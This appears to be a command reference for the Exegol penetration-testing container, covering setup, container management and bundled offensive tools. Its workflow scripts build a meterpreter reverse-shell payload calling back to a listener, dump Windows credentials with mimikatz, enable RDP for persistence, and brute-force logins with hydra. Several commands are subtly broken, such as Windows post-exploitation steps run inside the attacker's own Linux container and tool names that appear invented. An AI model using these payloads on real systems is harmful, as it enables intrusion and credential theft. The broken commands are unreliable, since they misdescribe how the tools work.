Exegol
Installation
Docker Installation (Linux/macOS)
# Clone Exegol repository
git clone https://github.com/ThePorgs/exegol.git
cd exegol
# Install Python dependencies
pip install -r requirements.txt
# Or use the setup script
bash exegol-install.sh
Docker Installation (Windows with WSL2)
# Install Docker Desktop with WSL2 backend
# Then follow Linux instructions within WSL2
# Clone and setup
git clone https://github.com/ThePorgs/exegol.git
cd exegol
pip install -r requirements.txt
Basic Commands
| Command | Description |
|---|---|
| `exegol list` | List available images and workspaces |
| `exegol info` | Display version and information |
| `exegol start <name>` | Start an Exegol container |
| `exegol stop <name>` | Stop a running container |
| `exegol shell <name>` | Open shell into a running container |
| `exegol remove <name>` | Remove a workspace |
| `exegol exec <name> <command>` | Execute command in container |
Image Management
Available Images
# List available Docker images
exegol list
# Pull a specific image (enterprise, full, minimal, light)
exegol pull --all # Pull all images
exegol pull -t full # Pull full image
exegol pull -t minimal # Pull minimal image
exegol pull -t light # Pull lightweight image
exegol pull -t enterprise # Pull enterprise image
Creating Workspaces
# Create a new workspace with interactive setup
exegol create
# Create workspace with specific image
exegol create -t full my_workspace
exegol create -t minimal my_workspace
exegol create -t light my_workspace
# Create with custom resource limits
exegol create -t full --cpu 4 --memory 8192 my_workspace
Container Management
Starting Containers
# Start interactive container
exegol start my_workspace
# Start container in background
exegol start -d my_workspace
# Start with specific tag/version
exegol start -t full my_workspace
# Start and automatically enter shell
exegol start --shell my_workspace
Managing Running Containers
# View running containers
docker ps | grep exegol
# Execute command in running container
exegol exec my_workspace whoami
# Open shell in running container
exegol shell my_workspace
# View container logs
docker logs my_workspace
# Inspect container details
docker inspect my_workspace
Pre-installed Tools
Reconnaissance & Enumeration
# DNS enumeration
nmap -sV target.com
dig target.com
dnsenum target.com
whois target.com
fierce -dns target.com
# Web reconnaissance
nikto -h target.com
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://target.com/FUZZ
# Domain enumeration
sublist3r -d target.com
amass enum -d target.com
Exploitation Frameworks
# Metasploit Framework
msfconsole
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe
# Empire/PSEmpire
empire
# Mimikatz for credential extraction
mimikatz.exe
privilege::debug
token::whoami
Post-Exploitation Tools
# Privilege escalation enumeration
LinEnum.sh
unix-privesc-check
PSUpgrade-Get.ps1
# Living off the land binaries
LOLBins
# Windows tools
psexec
psloggedon
wmic
reg query
Credential Tools
# Password attacks
hashcat -m 1000 -a 0 hashes.txt wordlist.txt
john --format=NT hashes.txt
hydra -l admin -P wordlist.txt http-post-form://target.com
# Credential dumping (from Exegol)
mimikatz.exe "privilege::debug" "token::whoami" "sekurlsa::logonpasswords"
Network & Tunnel Tools
# Network pivoting
sshuttle -r user@pivot.host 10.0.0.0/8
proxychains4 nmap -sV target.internal
# SSH tunneling
ssh -D 1080 -f -C -q -N user@pivot.host
ssh -L 3306:internal-db.com:3306 user@pivot.host
# VPN tools
openvpn client.ovpn
Workspace Configuration
Custom Setup
# Mount local directory in container
exegol start --share /home/user/pentests my_workspace
# Set environment variables
exegol start --env PROXY=http://proxy.com:8080 my_workspace
# Configure resource limits
exegol create -t full --cpu 8 --memory 16384 enterprise_workspace
Persistence & Customization
# Install additional tools in workspace
# (quote the command so that && is evaluated inside the container, not by the host shell)
exegol exec my_workspace 'apt update && apt install -y tool-name'
# Run custom installation script
exegol exec my_workspace bash /path/to/script.sh
# Copy files to workspace
docker cp localfile.txt my_workspace:/root/
Practical Workflows
Reconnaissance and Enumeration
#!/bin/bash
# Comprehensive reconnaissance workflow
TARGET="target.com"
WORKSPACE="recon_workspace"
# Start workspace
exegol start $WORKSPACE
# DNS enumeration
exegol exec $WORKSPACE dig +short $TARGET
exegol exec $WORKSPACE nslookup -type=MX $TARGET
# Subdomain enumeration
exegol exec $WORKSPACE sublist3r -d $TARGET -o subdomains.txt
# Port scanning
exegol exec $WORKSPACE nmap -sV -p- $TARGET > nmap_results.txt
# Web scanning
exegol exec $WORKSPACE nikto -h http://$TARGET > nikto_results.txt
Exploitation Workflow
#!/bin/bash
# Metasploit exploitation workflow
WORKSPACE="exploit_workspace"
TARGET="10.0.0.5"
LHOST="10.0.0.1"
LPORT="4444"
exegol start $WORKSPACE
# Generate payload
exegol exec $WORKSPACE msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=$LHOST LPORT=$LPORT -f exe -o payload.exe
# Start MSFConsole and handler
exegol exec $WORKSPACE msfconsole -x \
"use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; \
set LHOST $LHOST; set LPORT $LPORT; run"
Post-Exploitation and Persistence
#!/bin/bash
# Post-exploitation workflow
WORKSPACE="post_exploit_workspace"
TARGET="10.0.0.10"
exegol start $WORKSPACE
# Enumerate system
exegol exec $WORKSPACE systeminfo
exegol exec $WORKSPACE whoami /all
exegol exec $WORKSPACE Get-ChildItem -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Recurse
# Extract credentials (requires SYSTEM privileges)
exegol exec $WORKSPACE mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
# Enable Remote Desktop for persistence
exegol exec $WORKSPACE reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Volume and File Management
Mounting and Sharing
# Create named volume for persistent data
docker volume create exegol_data
# Mount volume when starting
exegol create --volumes exegol_data:/root/data my_workspace
# Copy files between host and container
docker cp /local/path/file.txt my_workspace:/root/
docker cp my_workspace:/root/results.txt /local/path/
# Mount entire directory for collaboration
docker run -v /path/to/projects:/root/projects -it exegol bash
Networking Configuration
Bridging and Exposing Services
# Create custom Docker network
docker network create exegol_net
# Run container on custom network
docker run --network exegol_net --name exegol -it exegol:full bash
# Expose ports for listener services
docker run -p 4444:4444 -p 8080:8080 --name exegol -it exegol:full bash
# Connect to internal services
docker run --network container:exegol_workspace -it exegol bash
Proxying and Routing
# Setup SOCKS proxy in container
exegol exec my_workspace ssh -D 1080 user@pivot.host
# Use proxychains to route traffic
exegol exec my_workspace proxychains4 nmap -sV 10.0.0.0/24
# Configure proxychains
# Edit /etc/proxychains4.conf in container:
# socks5 127.0.0.1 1080
Advanced Usage
Custom Image Building
# Clone repository to build custom image
git clone https://github.com/ThePorgs/exegol.git
cd exegol
# Modify Dockerfile for custom tools
vim Dockerfile
# Build custom image
docker build -t exegol:custom .
# Create workspace with custom image
exegol create -t custom my_custom_workspace
Multi-Workspace Management
# List all workspaces
exegol list
# Manage multiple concurrent workspaces
exegol start workspace1 workspace2 workspace3
# Execute same command across workspaces
for ws in workspace1 workspace2 workspace3; do
  exegol exec "$ws" nmap -sV 10.0.0.0/24 > "results_$ws.txt"
done
Container Orchestration
# Run multiple containers with docker-compose
cat > docker-compose.yml <<EOF
version: '3'
services:
  c2:
    image: exegol:full
    container_name: exegol_c2
    volumes:
      - ./tools:/root/tools
      - ./payloads:/root/payloads
    ports:
      - "4444:4444"
      - "8080:8080"
  proxy:
    image: exegol:minimal
    container_name: exegol_proxy
    networks:
      - exegol_net
# Declare the network referenced by the proxy service
networks:
  exegol_net:
EOF
docker-compose up -d
Troubleshooting
Common Issues
Docker daemon not running
# Start Docker daemon
sudo systemctl start docker
# Or on macOS
open -a Docker
Permission denied for Docker
# Add current user to docker group
# (docker group membership is root-equivalent on the host)
sudo usermod -aG docker $USER
# Apply new group membership in the current shell
newgrp docker
# Or log out and back in
Container out of disk space
# Check Docker disk usage
docker system df
# Prune unused volumes and images
docker system prune -a --volumes
# Increase Docker storage
# Edit ~/.docker/daemon.json:
# {"storage-opts": ["dm.basesize=20G"]}
Network connectivity issues
# Check container network
docker inspect my_workspace | grep -A 10 NetworkSettings
# Test connectivity
exegol exec my_workspace ping 8.8.8.8
exegol exec my_workspace curl -I https://google.com
# Restart networking
docker network inspect bridge
docker network disconnect bridge my_workspace
docker network connect bridge my_workspace
Performance Tuning
Resource Optimization
# Limit resource usage at container creation
exegol create -t full \
--cpu 4 \
--memory 8192 \
--cpuset-cpus 0-3 \
optimized_workspace
# Monitor resource usage
docker stats my_workspace
# Adjust limits on running container
docker update --memory 16g --memory-swap 16g my_workspace
Storage Optimization
# Use tmpfs for temporary files
docker run --tmpfs /tmp:rw,size=1g,exec -it exegol bash
# Optimize layer caching when building
# Use Docker BuildKit for better caching
DOCKER_BUILDKIT=1 docker build -t exegol:custom .
Best Practices
- Keep Exegol images updated regularly for latest tool versions
- Use separate workspaces for different engagement types
- Mount evidence directories as read-only to prevent accidental modification
- Run container with resource limits to prevent host system impact
- Clean up old containers and volumes to save disk space
- Document custom configurations and toolsets
- Use version control for custom Dockerfiles and scripts
- Isolate Exegol on separate network for sensitive testing
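
A check for three of the practices above (read-only evidence mounts, resource limits, a dedicated network), as an added example that is not part of the original page or of the Exegol project. It reads `docker inspect` JSON; the sample input is constructed, and treating a path component named `evidence` as an evidence directory is an assumption.

```python
import json

# Constructed sample of `docker inspect my_workspace` output, trimmed to the
# fields the checks read; values are illustrative, not from a real host.
SAMPLE_INSPECT = json.dumps([{
    "Name": "/my_workspace",
    "HostConfig": {"Memory": 0, "NanoCpus": 0, "CpuQuota": 0,
                   "NetworkMode": "host"},
    "Mounts": [
        {"Source": "/home/user/pentests/evidence",
         "Destination": "/root/evidence", "RW": True},
        {"Source": "/home/user/pentests/tools",
         "Destination": "/root/tools", "RW": True},
    ],
}])

# Assumption: evidence directories are recognised by this path component.
EVIDENCE_MARKER = "evidence"
# Network modes shared with the host or with every other default container.
SHARED_NETWORK_MODES = {"host", "default", "bridge"}


def audit_container(inspect_json):
    """Return a list of findings for each container in `docker inspect` JSON."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "?").lstrip("/")
        host = c.get("HostConfig", {})
        for m in c.get("Mounts", []):
            # RW is false when the mount was created with the :ro option.
            if EVIDENCE_MARKER in m.get("Source", "").split("/") and m.get("RW", True):
                findings.append(f"{name}: evidence mount {m['Source']} is writable")
        if not host.get("Memory"):
            findings.append(f"{name}: no memory limit")
        if not (host.get("NanoCpus") or host.get("CpuQuota")):
            findings.append(f"{name}: no CPU limit")
        mode = host.get("NetworkMode", "default")
        if mode in SHARED_NETWORK_MODES:
            findings.append(f"{name}: network mode '{mode}' is not a dedicated network")
    return findings


if __name__ == "__main__":
    for line in audit_container(SAMPLE_INSPECT):
        print(line)
```

To audit a real workspace, pass the output of `docker inspect my_workspace` to `audit_container` instead of the constructed sample.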
Last updated: 2026-03-30